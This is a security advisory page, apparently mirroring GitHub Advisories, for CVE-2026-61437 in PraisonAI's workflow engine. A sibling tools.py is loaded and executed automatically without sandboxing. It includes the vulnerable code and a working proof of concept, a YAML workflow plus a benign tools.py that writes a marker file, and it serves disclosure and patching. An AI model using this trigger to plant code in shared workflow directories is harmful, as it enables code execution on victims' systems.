OFFLINE
Awaiting data
Security intelligence
MajorCritical vulnerability

CVE-2026-61437: PraisonAI: Unsafe Dynamic Module Loading Leads to Arbitrary Code Execution via tools.py in AgentFlow

GitHub Advisories · officialPublished Oct 8, 2026Risk 37/100

### Summary An unsafe dynamic module loading vulnerability allows an attacker who can control a workflow file and a sibling `tools.py` to execute arbitrary Python code when the workflow is executed. ### Details The vulnerability is located in the workflow structured output resolution logic. File: src/praisonai-agents/praisonaiagents/workflows/workflows.py Method: AgentFlow._resolve_pydantic_class ```python if self.file_path: workflow_dir = Path(self.file_path).parent tools_path = workflow_dir / "tools.py" if tools_path.exists(): spec = importlib.util.spec_from_file_location("tools", tools_path) tools_module = importlib.util.module_from_spec(spec) spec.loader.exec_module(tools_module) # Arbitrary code execution ``` This code is reached during step execution when a step uses a string `output_pydantic`: ```python step_output_pydantic = getattr(step, '_output_pydantic', None) if step_output_pydantic and isinstance(step_output_pydantic, str): resolved_class = self._resolve_pydantic_class(step_output_pydantic) ``` `file_path` is set automatically by: - `WorkflowManager._load_workflow()` (used by workspace discovery) - `WorkflowManager.create_workflow()` It can also be set manually after `load_yaml()`: ```python wf = mgr.load_yaml("workflow.yaml") wf.file_path = "workflow.yaml" ``` The `exec_module()` call has no sandboxing and ignores the `PRAISONAI_ALLOW_*_TOOLS` environment variables used elsewhere in the project. ### PoC Create the following two files in the same directory: `/tmp/attack/attack.yaml` ```yaml name: AttackWorkflow steps: - name: generate action: "Produce structured output" output_pydantic: MaliciousModel ``` `/tmp/attack/tools.py` ```python print("[RCE] Arbitrary code executed from tools.py") import os with open("/tmp/rce_success.txt", "w") as f: f.write(f"RCE executed by PID {os.getpid()}") class MaliciousModel: @classmethod def model_json_schema(cls): return {"type": "object"} ``` Run the following Python code (adjust the path to your PraisonAI source): ```python import sys sys.path.insert(0, "/home/user/praisonai/src/praisonai-agents") from praisonaiagents.workflows import WorkflowManager from praisonaiagents.agent.agent import Agent mgr = WorkflowManager() wf = mgr.load_yaml("/tmp/attack/attack.yaml") wf.file_path = "/tmp/attack/attack.yaml" for step in wf.steps: step.output_pydantic = "MaliciousModel" step._output_pydantic = "MaliciousModel" if not getattr(step, "agent", None): step.agent = Agent( name="researcher", role="Researcher", goal="Generate output", instructions="Return structured data" ) wf.start("trigger") ``` ### Impact Type: Execution of Untrusted Local Code via Unsafe Dynamic Module Loading. Affected users include: - Users of `WorkflowManager(workspace_path=...)`, where workflow discovery automatically sets `file_path`. - Users of `WorkflowManager.create_workflow()`. - Applications that load workflows from repositories, templates, shared workflow collections, CI/CD artifacts, or other directories that may contain untrusted files. During workflow execution, a string `output_pydantic` reference causes the framework to automatically locate, import, and execute a sibling `tools.py` file. As a result, code contained in `tools.py` executes with the privileges of the workflow runner without requiring an explicit import or user approval step. Successful exploitation results in arbitrary Python code execution within the workflow process. An attacker may be able to read local files, access secrets available to the process, modify workflow behavior, perform network operations, or execute additional system commands. This behavior also bypasses the `PRAISONAI_ALLOW_TEMPLATE_TOOLS` / `PRAISONAI_ALLOW_LOCAL_TOOLS` protections used elsewhere in the project, allowing code execution through a separate workflow-resolution path.

Upgrade affected packages to a patched version: praisonaiagents 1.6.78.

Vendor
Not specified
Product
praisonaiagents
Exploitation
none known
Evidence
official
CVSS
7.8

This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.

Open primary source